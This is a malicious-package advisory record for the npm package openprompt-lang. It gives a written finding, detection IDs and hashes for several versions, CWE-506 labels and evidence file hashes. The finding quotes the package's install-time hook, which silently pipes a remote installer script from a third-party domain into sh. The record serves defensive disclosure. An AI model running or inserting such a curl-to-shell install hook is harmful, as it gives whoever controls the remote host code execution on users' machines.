-= Per source details. Do not edit below this line.=-
`scripts/postinstall.js` runs unconditionally during `npm install`. When the `opencode` binary is not on PATH (true for nearly every fresh install), it executes `npm install -g @opencode/cli 2>/dev/null || curl -fsSL https://opencode.ai/install.sh 2>/dev/null | sh`. The `curl`-piped-to-`sh` fallback fetches a mutable remote installer over the network and executes it with no hash or signature verification, no version pin, and from a third-party domain (opencode.ai) unrelated to the package publisher. Before that fallback, the same command line attempts an unpinned global install of `@opencode/cli`, silently extending the installer's dependency surface beyond what is declared; stderr of both commands is discarded (`2>/dev/null`), so a failure of either is not shown to the user. The package's stated purpose is a CLI for AI-annotation/context engineering; auto-installing an unrelated third-party tool via `curl | sh` from a non-publisher domain at install time is outside that scope and gives whoever controls opencode.ai (now or in the future) arbitrary code execution on every machine that installs this package.
{
"malicious-packages-origins": [
{
"id": "IN-MAL-2026-004585",
"versions": [
"1.3.0"
],
"sha256": "0b3d3d4d116f031b0ac1d902eea51337d80a08e1885acc484d698ba38d2aabdb",
"source": "amazon-inspector",
"modified_time": "2026-05-25T05:35:48Z",
"import_time": "2026-05-26T05:52:53.3295444Z"
},
{
"id": "IN-MAL-2026-004423",
"versions": [
"1.2.6"
],
"sha256": "19fb259f5df1648c36db4fa24dc1d050912e3fceabc8235316141e9febfe0b45",
"source": "amazon-inspector",
"modified_time": "2026-05-24T00:58:58Z",
"import_time": "2026-05-26T05:52:34.289865541Z"
},
{
"id": "IN-MAL-2026-004422",
"import_time": "2026-05-26T05:52:34.183494259Z",
"sha256": "2c9966d5fe1ab82b40fd24082c36cc9acf5677772768f75b30cda755d9cdd98f",
"source": "amazon-inspector",
"modified_time": "2026-05-24T00:57:45Z",
"versions": [
"1.2.6"
]
},
{
"id": "IN-MAL-2026-004449",
"versions": [
"1.2.7"
],
"sha256": "560085e8391d93e3f1c17bd78a1f3273b240f098442ab2f0414f1fb5cc2f6d3c",
"source": "amazon-inspector",
"modified_time": "2026-05-24T02:29:05Z",
"import_time": "2026-05-26T05:52:37.338586987Z"
},
{
"id": "IN-MAL-2026-004414",
"versions": [
"1.2.4"
],
"sha256": "a127c4981cfea8a1be921c08b4ac3e915371041838d3981efc24ddc53b694a5d",
"source": "amazon-inspector",
"modified_time": "2026-05-24T00:38:07Z",
"import_time": "2026-05-26T05:52:33.29493036Z"
},
{
"id": "IN-MAL-2026-004413",
"versions": [
"1.2.4"
],
"sha256": "a91abce6346f158c33db03696583627a1cf7f6805aa6b3f69afc85e0a32855d8",
"source": "amazon-inspector",
"modified_time": "2026-05-24T00:37:20Z",
"import_time": "2026-05-26T05:52:33.159133434Z"
},
{
"id": "IN-MAL-2026-004409",
"versions": [
"1.2.1"
],
"sha256": "b90e8e14dd8b898c010517a81ca6e33ab98d90a514fd58d4457899c71120300a",
"source": "amazon-inspector",
"modified_time": "2026-05-24T00:14:52Z",
"import_time": "2026-05-26T05:52:32.704275064Z"
},
{
"id": "IN-MAL-2026-004402",
"import_time": "2026-05-26T05:52:31.667285387Z",
"sha256": "e0a29910da10cc8d97c356e724ac483dff82a0c91225e3cdb868f1d160886d92",
"source": "amazon-inspector",
"modified_time": "2026-05-23T23:35:56Z",
"versions": [
"1.2.0"
]
},
{
"id": "IN-MAL-2026-004408",
"versions": [
"1.2.1"
],
"sha256": "db2d671dd8a5cc56fe37c817c6f7a63f46f2692b858bf0ca2aa5edc34dbb15b0",
"source": "amazon-inspector",
"modified_time": "2026-05-24T00:13:43Z",
"import_time": "2026-05-26T05:52:32.417343895Z"
},
{
"id": "IN-MAL-2026-004411",
"versions": [
"1.2.2"
],
"sha256": "29ec99421b46db9c46b09afbe1da0db595ab63584c54f31e04101739273ce992",
"source": "amazon-inspector",
"modified_time": "2026-05-24T00:22:56Z",
"import_time": "2026-05-26T05:52:32.929380025Z"
},
{
"id": "IN-MAL-2026-004412",
"import_time": "2026-05-26T05:52:33.028301822Z",
"sha256": "4b78d9c204ace5f9ebde348fd931fb542ab85cd9297d0f4728fa904d5cb44a48",
"source": "amazon-inspector",
"modified_time": "2026-05-24T00:33:14Z",
"versions": [
"1.2.3"
]
},
{
"id": "IN-MAL-2026-004448",
"versions": [
"1.2.7"
],
"sha256": "aba8dd892bd7521ed379e360d72bd0a09255a929e64e0d33a0cf76035e65da1c",
"source": "amazon-inspector",
"modified_time": "2026-05-24T02:27:50Z",
"import_time": "2026-05-26T05:52:37.228436646Z"
},
{
"id": "IN-MAL-2026-004399",
"versions": [
"1.1.0"
],
"sha256": "b374a3566f692f636a236c0243da650b4db264f029477c431634bd805fca1626",
"source": "amazon-inspector",
"modified_time": "2026-05-23T23:03:36Z",
"import_time": "2026-05-26T05:52:31.353973464Z"
},
{
"id": "IN-MAL-2026-004410",
"versions": [
"1.2.2"
],
"sha256": "e69c04ece59cfc2568d850cfc0e4554a9799196e29bdcfffbe61a04451714a0d",
"source": "amazon-inspector",
"modified_time": "2026-05-24T00:22:04Z",
"import_time": "2026-05-26T05:52:32.799550433Z"
},
{
"id": "IN-MAL-2026-004586",
"versions": [
"1.3.0"
],
"sha256": "90498cc911c11219a4c19a0c864132e7e42de8e63f4f52b44360cd19d318e913",
"source": "amazon-inspector",
"modified_time": "2026-05-25T05:37:21Z",
"import_time": "2026-05-26T05:52:53.518281193Z"
},
{
"id": "IN-MAL-2026-004400",
"versions": [
"1.1.0"
],
"sha256": "c559dde5b95604374665d3f852b7ad50ee78568e7a517a182496362838678e07",
"source": "amazon-inspector",
"modified_time": "2026-05-23T23:03:37Z",
"import_time": "2026-05-26T05:52:31.4594297Z"
},
{
"id": "IN-MAL-2026-004404",
"import_time": "2026-05-26T05:52:31.859851238Z",
"sha256": "c9301d7c5a77059d6948110ed5ce20651c37b8df367db99f5f807496313fc33d",
"source": "amazon-inspector",
"modified_time": "2026-05-23T23:36:56Z",
"versions": [
"1.2.0"
]
}
]
}[
{
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code",
"cweId": "CWE-506"
},
{
"cweId": "CWE-506",
"name": "Embedded Malicious Code",
"description": "The product contains code that appears to be malicious in nature."
},
{
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code",
"cweId": "CWE-506"
},
{
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code",
"cweId": "CWE-506"
},
{
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code",
"cweId": "CWE-506"
},
{
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code",
"cweId": "CWE-506"
},
{
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code",
"cweId": "CWE-506"
},
{
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code",
"cweId": "CWE-506"
},
{
"cweId": "CWE-506",
"name": "Embedded Malicious Code",
"description": "The product contains code that appears to be malicious in nature."
}
]
{
"evidence_files": [
{
"path": "scripts/postinstall.js",
"sha256": "2515e6c5a0ee46d25c8811e35e5e2679fcbe08cfb77b27f6e82c172165c19c58",
"tlsh": "4eb1e07692f801343f42c0ad3d1b1012b07a79637704f9987b9ebba95fcd82885622fd"
}
],
"package_integrity": [
{
"filename": "openprompt-lang-1.3.0.tgz",
"hashes": {
"sha512_sri": "sha512-AQgBNBhfzGND+x14tiAutREAWF1eSlEItVAth1S7e0RvwbRtSlMDF3Q4FYzXhtp+f7v6aaNn/w00htJUBgQm2A==",
"sha1": "d9b5efbc402ec6a1373b98740a72573274325873"
}
}
],
"domains": [
"34.9.16.104.in-addr.arpa"
]
}
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/openprompt-lang/MAL-2026-4630.json"